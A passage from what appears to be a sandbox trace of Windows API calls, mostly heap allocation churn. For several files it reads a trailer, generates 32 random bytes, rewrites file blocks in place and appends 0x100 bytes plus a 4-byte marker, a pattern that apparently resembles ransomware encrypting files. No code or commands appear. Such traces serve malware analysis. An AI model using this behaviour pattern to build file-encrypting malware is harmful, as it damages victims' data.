| out: hHeap=0x280000) returned 1 [0078.015] GetProcessHeap () returned 0x280000 [0078.015] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.015] GetProcessHeap () returned 0x280000 [0078.015] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.015] GetProcessHeap () returned 0x280000 [0078.015] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.015] GetProcessHeap () returned 0x280000 [0078.015] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.015] GetProcessHeap () returned 0x280000 [0078.015] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.016] GetProcessHeap () returned 0x280000 [0078.016] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.016] GetProcessHeap () returned 0x280000 [0078.016] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.016] GetProcessHeap () returned 0x280000 [0078.016] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.016] GetProcessHeap () returned 0x280000 [0078.016] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.016] GetProcessHeap () returned 0x280000 [0078.016] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.016] GetProcessHeap () returned 0x280000 [0078.016] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.016] GetProcessHeap () returned 0x280000 [0078.016] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.016] GetProcessHeap () returned 0x280000 [0078.016] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x24) returned 0x7d941e0 [0078.016] GetProcessHeap () returned 0x280000 [0078.016] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.016] GetProcessHeap () returned 0x280000 [0078.016] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x40) returned 0x7d975e8 [0078.016] GetProcessHeap () returned 0x280000 [0078.016] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d941e0 | out: hHeap=0x280000) returned 1 [0078.016] GetProcessHeap () returned 0x280000 [0078.016] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e1a48 [0078.016] GetProcessHeap () returned 0x280000 [0078.016] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d975e8 | out: hHeap=0x280000) returned 1 [0078.016] GetProcessHeap () returned 0x280000 [0078.016] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d531d8 [0078.016] GetProcessHeap () returned 0x280000 [0078.016] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e1a48 | out: hHeap=0x280000) returned 1 [0078.016] GetProcessHeap () returned 0x280000 [0078.016] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.016] GetProcessHeap () returned 0x280000 [0078.016] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d531d8 | out: hHeap=0x280000) returned 1 [0078.016] GetProcessHeap () returned 0x280000 [0078.016] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.017] GetProcessHeap () returned 0x280000 [0078.017] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.017] GetProcessHeap () returned 0x280000 [0078.017] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.017] GetProcessHeap () returned 0x280000 [0078.017] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.017] GetProcessHeap () returned 0x280000 [0078.017] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.017] GetProcessHeap () returned 0x280000 [0078.017] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.017] GetProcessHeap () returned 0x280000 [0078.017] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.017] GetProcessHeap () returned 0x280000 [0078.017] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.017] GetProcessHeap () returned 0x280000 [0078.017] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.017] GetProcessHeap () returned 0x280000 [0078.017] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.017] GetProcessHeap () returned 0x280000 [0078.017] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.017] GetProcessHeap () returned 0x280000 [0078.017] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.017] GetProcessHeap () returned 0x280000 [0078.017] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.017] GetProcessHeap () returned 0x280000 [0078.017] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.017] GetProcessHeap () returned 0x280000 [0078.017] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.018] GetProcessHeap () returned 0x280000 [0078.018] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.018] GetProcessHeap () returned 0x280000 [0078.018] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.018] GetProcessHeap () returned 0x280000 [0078.018] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.018] GetProcessHeap () returned 0x280000 [0078.018] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.018] GetProcessHeap () returned 0x280000 [0078.018] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.018] GetProcessHeap () returned 0x280000 [0078.018] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.018] GetProcessHeap () returned 0x280000 [0078.018] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.018] GetProcessHeap () returned 0x280000 [0078.018] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.018] GetProcessHeap () returned 0x280000 [0078.018] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.018] GetProcessHeap () returned 0x280000 [0078.018] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x220) returned 0x7dc1440 [0078.018] GetProcessHeap () returned 0x280000 [0078.018] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.018] GetProcessHeap () returned 0x280000 [0078.018] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47ca8 | out: hHeap=0x280000) returned 1 [0078.018] GetProcessHeap () returned 0x280000 [0078.018] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3b0 | out: hHeap=0x280000) returned 1 [0078.018] GetProcessHeap () returned 0x280000 [0078.018] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0078.018] GetProcessHeap () returned 0x280000 [0078.018] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9ccf8 | out: hHeap=0x280000) returned 1 [0078.018] SetFilePointerEx (in: hFile=0x82c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.019] WriteFile (in: hFile=0x82c, lpBuffer=0x7d532e0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d532e0*, lpNumberOfBytesWritten=0x722fd44*=0x100, lpOverlapped=0x0) returned 1 [0078.019] WriteFile (in: hFile=0x82c, lpBuffer=0x722fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x722fd48*, lpNumberOfBytesWritten=0x722fd44*=0x4, lpOverlapped=0x0) returned 1 [0078.019] GetProcessHeap () returned 0x280000 [0078.019] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8bf0058 | out: hHeap=0x280000) returned 1 [0078.019] GetProcessHeap () returned 0x280000 [0078.019] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d068 | out: hHeap=0x280000) returned 1 [0078.019] GetProcessHeap () returned 0x280000 [0078.019] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d532e0 | out: hHeap=0x280000) returned 1 [0078.019] CloseHandle (hObject=0x82c) returned 1 [0078.021] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 41 [0078.023] SetFilePointerEx (in: hFile=0x830, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.023] ReadFile (in: hFile=0x830, lpBuffer=0x722fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x722fd4c*, lpNumberOfBytesRead=0x722fd08*=0x0, lpOverlapped=0x0) returned 1 [0078.023] SetFilePointerEx (in: hFile=0x830, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.023] GetProcessHeap () returned 0x280000 [0078.023] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d532e0 [0078.024] GetProcessHeap () returned 0x280000 [0078.024] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x7d9d068 [0078.024] SystemFunction036 (in: RandomBuffer=0x7d9d068, RandomBufferLength=0x20 | out: RandomBuffer=0x7d9d068) returned 1 [0078.024] GetProcessHeap () returned 0x280000 [0078.024] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1000) returned 0x8bf0058 [0078.024] ReadFile (in: hFile=0x830, lpBuffer=0x8bf0058, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x8bf0058*, lpNumberOfBytesRead=0x722fd08*=0x1000, lpOverlapped=0x0) returned 1 [0078.124] SetFilePointerEx (in: hFile=0x830, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.124] WriteFile (in: hFile=0x830, lpBuffer=0x8bf0058*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x8bf0058*, lpNumberOfBytesWritten=0x722fd44*=0x1000, lpOverlapped=0x0) returned 1 [0078.128] GetProcessHeap () returned 0x280000 [0078.129] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47ca8 [0078.129] GetProcessHeap () returned 0x280000 [0078.129] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0078.129] GetProcessHeap () returned 0x280000 [0078.129] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9ccf8 [0078.129] GetProcessHeap () returned 0x280000 [0078.129] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0078.129] GetProcessHeap () returned 0x280000 [0078.129] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3b0 [0078.129] GetProcessHeap () returned 0x280000 [0078.129] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0078.129] GetProcessHeap () returned 0x280000 [0078.129] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.129] GetProcessHeap () returned 0x280000 [0078.129] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.129] GetProcessHeap () returned 0x280000 [0078.129] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.129] GetProcessHeap () returned 0x280000 [0078.129] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.129] GetProcessHeap () returned 0x280000 [0078.129] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.129] GetProcessHeap () returned 0x280000 [0078.129] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.129] GetProcessHeap () returned 0x280000 [0078.129] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.129] GetProcessHeap () returned 0x280000 [0078.129] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.129] GetProcessHeap () returned 0x280000 [0078.129] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.129] GetProcessHeap () returned 0x280000 [0078.129] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.129] GetProcessHeap () returned 0x280000 [0078.129] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.129] GetProcessHeap () returned 0x280000 [0078.129] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.129] GetProcessHeap () returned 0x280000 [0078.129] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.129] GetProcessHeap () returned 0x280000 [0078.130] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.130] GetProcessHeap () returned 0x280000 [0078.130] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.130] GetProcessHeap () returned 0x280000 [0078.130] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.130] GetProcessHeap () returned 0x280000 [0078.130] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.130] GetProcessHeap () returned 0x280000 [0078.130] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.130] GetProcessHeap () returned 0x280000 [0078.130] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.130] GetProcessHeap () returned 0x280000 [0078.130] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.130] GetProcessHeap () returned 0x280000 [0078.130] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.130] GetProcessHeap () returned 0x280000 [0078.130] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.130] GetProcessHeap () returned 0x280000 [0078.130] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.130] GetProcessHeap () returned 0x280000 [0078.130] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.130] GetProcessHeap () returned 0x280000 [0078.130] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.130] GetProcessHeap () returned 0x280000 [0078.130] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.130] GetProcessHeap () returned 0x280000 [0078.130] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.130] GetProcessHeap () returned 0x280000 [0078.130] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.130] GetProcessHeap () returned 0x280000 [0078.130] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.130] GetProcessHeap () returned 0x280000 [0078.130] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.130] GetProcessHeap () returned 0x280000 [0078.130] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.130] GetProcessHeap () returned 0x280000 [0078.130] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.130] GetProcessHeap () returned 0x280000 [0078.130] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x24) returned 0x7d941e0 [0078.131] GetProcessHeap () returned 0x280000 [0078.131] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.131] GetProcessHeap () returned 0x280000 [0078.131] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x40) returned 0x7d975e8 [0078.131] GetProcessHeap () returned 0x280000 [0078.131] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d941e0 | out: hHeap=0x280000) returned 1 [0078.131] GetProcessHeap () returned 0x280000 [0078.131] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e1a48 [0078.131] GetProcessHeap () returned 0x280000 [0078.131] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d975e8 | out: hHeap=0x280000) returned 1 [0078.131] GetProcessHeap () returned 0x280000 [0078.131] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d531d8 [0078.131] GetProcessHeap () returned 0x280000 [0078.131] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e1a48 | out: hHeap=0x280000) returned 1 [0078.131] GetProcessHeap () returned 0x280000 [0078.131] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.131] GetProcessHeap () returned 0x280000 [0078.131] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d531d8 | out: hHeap=0x280000) returned 1 [0078.131] GetProcessHeap () returned 0x280000 [0078.131] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.131] GetProcessHeap () returned 0x280000 [0078.131] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.131] GetProcessHeap () returned 0x280000 [0078.131] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.131] GetProcessHeap () returned 0x280000 [0078.131] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.131] GetProcessHeap () returned 0x280000 [0078.131] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.131] GetProcessHeap () returned 0x280000 [0078.131] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.131] GetProcessHeap () returned 0x280000 [0078.131] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.132] GetProcessHeap () returned 0x280000 [0078.132] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.132] GetProcessHeap () returned 0x280000 [0078.132] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.132] GetProcessHeap () returned 0x280000 [0078.132] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.132] GetProcessHeap () returned 0x280000 [0078.132] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.132] GetProcessHeap () returned 0x280000 [0078.132] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.132] GetProcessHeap () returned 0x280000 [0078.132] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.132] GetProcessHeap () returned 0x280000 [0078.132] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.132] GetProcessHeap () returned 0x280000 [0078.132] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.132] GetProcessHeap () returned 0x280000 [0078.132] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.132] GetProcessHeap () returned 0x280000 [0078.132] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.132] GetProcessHeap () returned 0x280000 [0078.132] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.132] GetProcessHeap () returned 0x280000 [0078.132] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.132] GetProcessHeap () returned 0x280000 [0078.132] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.132] GetProcessHeap () returned 0x280000 [0078.132] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.132] GetProcessHeap () returned 0x280000 [0078.132] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.133] GetProcessHeap () returned 0x280000 [0078.133] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.133] GetProcessHeap () returned 0x280000 [0078.133] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.133] GetProcessHeap () returned 0x280000 [0078.133] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x220) returned 0x7dc1440 [0078.133] GetProcessHeap () returned 0x280000 [0078.133] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.133] GetProcessHeap () returned 0x280000 [0078.133] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47ca8 | out: hHeap=0x280000) returned 1 [0078.133] GetProcessHeap () returned 0x280000 [0078.133] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3b0 | out: hHeap=0x280000) returned 1 [0078.133] GetProcessHeap () returned 0x280000 [0078.133] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0078.133] GetProcessHeap () returned 0x280000 [0078.133] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9ccf8 | out: hHeap=0x280000) returned 1 [0078.133] SetFilePointerEx (in: hFile=0x830, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.133] WriteFile (in: hFile=0x830, lpBuffer=0x7d532e0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d532e0*, lpNumberOfBytesWritten=0x722fd44*=0x100, lpOverlapped=0x0) returned 1 [0078.133] WriteFile (in: hFile=0x830, lpBuffer=0x722fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x722fd48*, lpNumberOfBytesWritten=0x722fd44*=0x4, lpOverlapped=0x0) returned 1 [0078.133] GetProcessHeap () returned 0x280000 [0078.133] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8bf0058 | out: hHeap=0x280000) returned 1 [0078.133] GetProcessHeap () returned 0x280000 [0078.133] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d068 | out: hHeap=0x280000) returned 1 [0078.133] GetProcessHeap () returned 0x280000 [0078.133] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d532e0 | out: hHeap=0x280000) returned 1 [0078.134] CloseHandle (hObject=0x830) returned 1 [0078.135] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 42 [0078.135] SetFilePointerEx (in: hFile=0x834, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.135] ReadFile (in: hFile=0x834, lpBuffer=0x722fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x722fd4c*, lpNumberOfBytesRead=0x722fd08*=0x0, lpOverlapped=0x0) returned 1 [0078.135] SetFilePointerEx (in: hFile=0x834, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.135] GetProcessHeap () returned 0x280000 [0078.135] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d532e0 [0078.136] GetProcessHeap () returned 0x280000 [0078.136] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x7d9d068 [0078.136] SystemFunction036 (in: RandomBuffer=0x7d9d068, RandomBufferLength=0x20 | out: RandomBuffer=0x7d9d068) returned 1 [0078.136] GetProcessHeap () returned 0x280000 [0078.136] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1000) returned 0x8bf0058 [0078.136] ReadFile (in: hFile=0x834, lpBuffer=0x8bf0058, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x8bf0058*, lpNumberOfBytesRead=0x722fd08*=0x4b8, lpOverlapped=0x0) returned 1 [0078.150] SetFilePointerEx (in: hFile=0x834, liDistanceToMove=0xfffffb48, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.150] WriteFile (in: hFile=0x834, lpBuffer=0x8bf0058*, nNumberOfBytesToWrite=0x4b8, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x8bf0058*, lpNumberOfBytesWritten=0x722fd44*=0x4b8, lpOverlapped=0x0) returned 1 [0078.150] GetProcessHeap () returned 0x280000 [0078.150] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47ca8 [0078.150] GetProcessHeap () returned 0x280000 [0078.150] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0078.150] GetProcessHeap () returned 0x280000 [0078.150] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9ccf8 [0078.150] GetProcessHeap () returned 0x280000 [0078.150] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0078.150] GetProcessHeap () returned 0x280000 [0078.150] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3b0 [0078.150] GetProcessHeap () returned 0x280000 [0078.150] 